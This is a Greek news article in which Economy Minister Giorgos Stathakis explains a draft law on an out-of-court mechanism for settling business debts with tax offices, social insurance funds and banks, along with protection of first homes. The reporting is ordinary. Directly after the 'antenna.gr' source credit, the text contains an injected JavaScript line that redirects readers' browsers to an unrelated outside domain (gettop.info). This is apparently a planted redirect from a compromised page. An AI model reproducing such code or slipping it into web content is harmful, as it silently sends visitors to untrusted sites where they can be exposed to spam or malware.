Σταθάκης: Ο νομοθέτης προστατεύει αυτόν που είναι σε πραγματική αδυναμία, όχι τους μπατακτσήδες

0
7

 

Ο αρμόδιος υπουργός, Γιώργος Σταθάκης, μιλώντας στην πρωινή εκπομπή του ΑΝΤ1 Καλημέρα Ελλάδα διευκρίνισε τα βασικά σημεία λειτουργίας του σχεδίου νόμου που αφορά εξωδικαστικό μηχανισμό ρύθμισης των δημοσίων και ιδιωτικών οφειλών με διετή ισχύ.

Η χρονική ισχύ του εξωδικαστικού μηχανισμού θα αποτελέσει θέμα συζήτησης με τους δανειστές, που καταφθάνουν την επόμενη εβδομάδα στην Αθήνα, για την εκκίνηση των διαπραγματεύσεων για τη δεύτερη αξιολόγηση. Σύμφωνα με πληροφορίες του ΑΝΤ1, οι δανειστές προτείνουν ένα και όχι δύο χρόνια ισχύ για τον εξωδικαστικό μηχανισμό.

Το τελικό σχέδιο νόμου έχει διαμορφωθεί από το υπουργείο Οικονομίας και έχει τεθεί υπό την έγκριση των δανειστών, ώστε να κατατεθεί προς ψήφιση στα τέλη Οκτωβρίου.

«Πρόθεση είναι μία επιχείρηση που χρωστά ορισμένες κατηγορίες φόρων και εισφορών να μπορεί να προσφύγει στο μηχανισμό, ο μηχανισμός να κρίνει τη βιωσιμότητα και τότε αν συμφωνήσουν όλες οι πλευρές, να επικυρωθεί από το δικαστήριο και να εφαρμοστεί. Δεν αφορά σε συγκεκριμένο ποσοστό κουρέματος, αλλά στη βιωσιμότητα της επιχείρησης», διευκρίνισε ο Γιώργος Σταθάκης.

Σύμφωνα με το σχέδιο νόμου, Εφορίες, Ασφαλιστικά Ταμεία και Τράπεζες θα συμμετέχουν από κοινού στην απομείωση των οφειλών υπερχρεωμένων επιχειρήσεων, υπό την προϋπόθεση ότι θα κριθούν βιώσιμες.

Στον εξωδικαστικό μηχανισμό θα έχουν δικαίωμα ένταξης όλες οι επιχειρήσεις, μικρές, μεσαίες και μεγάλες, αλλά και οι ελεύθεροι επαγγελματίες που θέλουν να ρυθμίσουν τις οφειλές του, όπως επιβεβαίωσε και ο Υπουργός Οικονομίας, μιλώντας στον ΑΝΤ1.

Ερωτηθείς για το αν ο μηχανισμός θα αποτελέσει πεδίο εκμετάλλευσης από τους λεγόμενους «μπατακτσήδες», απάντησε ότι, «ο νομοθέτης προστατεύει μόνο αυτόν που είναι σε πραγματική αδυναμία και όχι τους μπατακτσήδες. Αν επιλέξει τον μηχανισμό, προστατεύεται από την νομοθεσία, αλλά στο επόμενο χρονικό διάστημα θα φανεί αν έχει τη δυνατότητα και δεν πληρώνει».

Αναφορικά με το ποιος μπορεί να προβεί σε απόφαση για πλειστηριασμό, μετά το θέμα που έχει προκύψει με τον Δήμο Αθηναίων, ξεκαθάρισε ότι, «την πολιτική των κατασχέσεων την αποφασίζει μόνο το υπουργείο Οικονομικών, δεν ισχύει τίποτε άλλο».

Τέλος, ο Γ.Σταθάκης, αναφερόμενος στη σύνθεση του μετοχικού κεφαλαίου των επιχειρήσεων που προχωρούν σε εξωδικαστικό μηχανισμό, διευκρίνισε ότι, «υπό ορισμένες συνθήκες αλλάζει η μετοχική σύνθεση της εταιρείας. Αν έχουμε συμφωνίες, όπως στο Μαρινόπουλο, ο κανονισμός περιλαμβάνει και την αλλαγή του μετοχικού σχήματος».

Σχετικά με την προστασία της α’ κατοικίας για χρέη στο Δημόσιο, η οποία προαναγγέλθηκε χθες από την κυβέρνηση, εξήγησε ότι, αυτή αφορά σε υπερχρεωμένα νοικοκυριά, ενώ οι πρώτες κατοικίες που έχουν μπει σε υποθήκη για επιχειρηματικούς λόγους, δεν καλύπτονται, αλλά οι οφειλέτες θα μπορούν να προσφύγουν στον μηχανισμό για τα κόκκινα επιχειρηματικά δάνεια. Πρόσθεσε δε ότι, «η α’ κατοικία προστατεύεται για τα 2/3 των πολιτών, με την προϋπόθεση ότι, υπάρχει στεγαστικό δάνειο και χρέος σε τράπεζες και Δημόσιο. Αν κάποιος χρωστά μόνο στο Δημόσιο και όχι στις τράπεζες, καλύπτεται σύντομα με τον νέο νόμο».

«Η αλλαγή που προσθέσαμε στον νόμο Κατσέλη είναι ότι αυτός που χρωστά στεγαστικό δάνειο, αθροίζονται τα δάνεια. Κάποιος που χρωστά σε πολλές κατηγορίες δανείων καλύπτεται από τον νόμο Κατσέλη», τόνισε ο υπουργός.

Πηγή: antenna.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here